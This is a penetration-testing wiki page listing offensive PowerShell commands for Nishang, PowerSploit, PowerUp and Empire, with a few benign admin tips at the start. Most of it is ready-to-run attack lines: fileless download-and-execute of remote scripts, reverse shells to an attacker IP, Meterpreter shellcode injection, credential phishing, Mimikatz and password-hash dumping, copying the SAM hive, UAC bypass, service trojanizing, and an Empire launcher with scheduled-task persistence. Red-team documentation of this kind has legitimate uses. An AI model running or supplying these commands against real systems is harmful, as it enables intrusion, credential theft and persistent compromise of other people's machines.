PowerShell frameworks

From pentestwiki.org


To check the version:


Powershell v1.0: Win XP SP2, 2003 Server SP1, Vista
Powershell v2.0: Win 7, Server 2008 R2
Powershell v3.0: Win 8, Server 2012
Powershell v4.0: Win 8.1, Server 2012 R2
Powershell v5.0: Win 10

Change default colors:

PS>$host.ui.RawUI.ForegroundColor = "black"
PS>$host.ui.RawUI.BackgroundColor = "white"

To compile a ps1 into .exe use PowerGUI Pro script editor

  • List hotfixes

Equivalent using wmic:

PS>wmic qfe list

  • Detect sandboxed environment
PS>Get-wmiobject win32_bios | format-list Name,SerialNumber

  • Handling Certificates

To see installed user certificates

PS>Get-ChildItem -Path "Cert:\CurrentUser\My"
PS>Get-ChildItem -Path "Cert:\LocalMachine"

Using GUI:


To create a self-signed certificate:

PS>$cert = New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname testcert.example.org

  • Show system uptime
PS>Get-CimInstance -ClassName win32_operatingsystem
PS> select csname, lastbootuptime


Capturing a screenshot

[Parameter(Mandatory = $true)][string]$Path
$FileName = "$env:COMPUTERNAME - $(get-date -f yyyy-MM-dd_HHmmss).bmp"
$File = "$Path\$FileName"
Add-Type -AssemblyName System.Windows.Forms
Add-type -AssemblyName System.Drawing
$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
$Width = $Screen.Width
$Height = $Screen.Height
$Left = $Screen.Left
$Top = $Screen.Top
$bitmap = New-Object System.Drawing.Bitmap $Width, $Height
$graphic = [System.Drawing.Graphics]::FromImage($bitmap)
$graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
Write-Output "Screenshot saved to:"
Write-Output $File

Source: https://www.pdq.com/blog/capturing-screenshots-with-powershell-and-net/


Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

in kali: /usr/share/nishang

C:>powershell.exe –exec bypass –Command "& {Import-Module ‘C:\Users\User\Desktop\temp\Port-Scan.ps1’; Port-Scan –StartAddress –Endaddress –ResolveHost -ScanPort }"

C:>powershell.exe –exec bypass –Command "& {Import-Module ‘C:\Users\User\Desktop\temp\Remove-Update.ps1’; Remove-Update KB2534366}"

C:>powershell.exe –exec bypass –Command "& {Import-Module ‘C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1’; Invoke-CredentialsPhish}"

C:>powershell.exe –exec bypass –Command "& {Import-Module ‘C:\Users\User\Desktop\temp\Get-PassHashes.ps1’; Get-PassHashes}"

  • Fileless execution
C:>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString(‘http://$IP/Check-VM.ps1’); Check-VM"

  • Dont work in Windows 7
C:>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString(‘http://$IP/winpost/Invoke-PowerShellTcp.ps1’); Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 443"

  • In Windows 7:
C:>powershell -ep bypass -command "(New-Object Net.WebClient).DownloadFile('http://$IP/winpost/Invoke-PowerShellTcp.ps1', ‘Invoke-PowerShellTcp.ps1’); Import-Module .\Invoke-PowershellTcp.ps1; Invoke-PowershellTcp -IPAddress $LOCALIP -Reverse -Port 443"

Other useful modules:

  • Powerpreter
  • Out-CHM
  • Out-Word
  • Out-Excel
  • Out-HTA


C:>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP:8000/CodeExecution/Invoke-Shellcode.ps1');\ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $LOCALIP -Lport 4444 -Force"

PS>IEX (New-Object Net.WebClient).DownloadString(“http://$IP:8000/Recon/Invoke-ReverseDnsLookup.ps1”);\ Invoke-ReverseDnsLookup -IpRange $IP/24

PS>IEX (New-Object Net.WebClient).DownloadString(“http://$IP:8000/Exfiltration/Invoke-Mimikatz.ps1”);\ Invoke-Mimikatz -DumpCreds

PS>IEX (New-Object Net.WebClient).DownloadString(“http://$IP:8000/Exfiltration/Invoke-NinjaCopy.ps1”);\ Invoke-NinjaCopy -Path “C:\Windows\System32\config\SAM” -LocalDestination “C:\Users\master\Desktop\SAM”


PowerUp is a PowerShell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, and escalation opportunities. It is part of PowerSploit and resides at https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc. Empire implements PowerUp’s escalation functionality in the privesc/powerup/* modules.

C:>powershell.exe -nop -exec bypass

PS>Import-Module .\PowerUp.ps1

PS>Invoke-AllChecks | Out-File -Encoding ASCII checks.txt


PS>import-module .\bypass-uac.ps1

Does not work for Windows Server 2012:

PS>Bypass-UAC -Method UacMethodSysprep

Work for Windows Server 2012:

PS>Bypass-UAC -Method ucmDismMethod
PS>Bypass-UAC -Method UacMethodMMC2

More info:

Trojanize DLL

See also Msfvenom payloads

Trojanize Windows Service

PS>Write-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>] [-Credential <PSCredential>] [-Command <String>] [-Path <String>]

Source: https://powersploit.readthedocs.io/en/latest/Privesc/Write-ServiceBinary/


Empire is a PowerShell and Python post-exploitation agent


root #cd Empire/
root #./setup/install.sh


root #./empire
(Empire) > listeners

(Empire: listeners) > uselistener http
(Empire: listeners/http) > execute
(Empire: listeners/http) > launcher powershell
powershell -noP -sta -w 1 -enc SQBmACgAJA<REDACTED>QB8AEkARQBYAA==

(Empire: listeners/http) >

Copy the generated powershell payload in the Windows target to open a session in Empire:

C:>powershell -noP -sta -w 1 -enc SQBmACgAJA<REDACTED>QB8AEkARQBYAA==

To handle agents in Empire:

$interact $AGENTID
$rename [old name] [new name]

Advanced modules:

$bypassuac http
$set Listener http

or disk-less

$usemodule privesc/bypassuac_wscript

Credentials gathering:



$usemodule persistence/elevated/schtasks



A Powershell Privilege Escalation Enumeration Script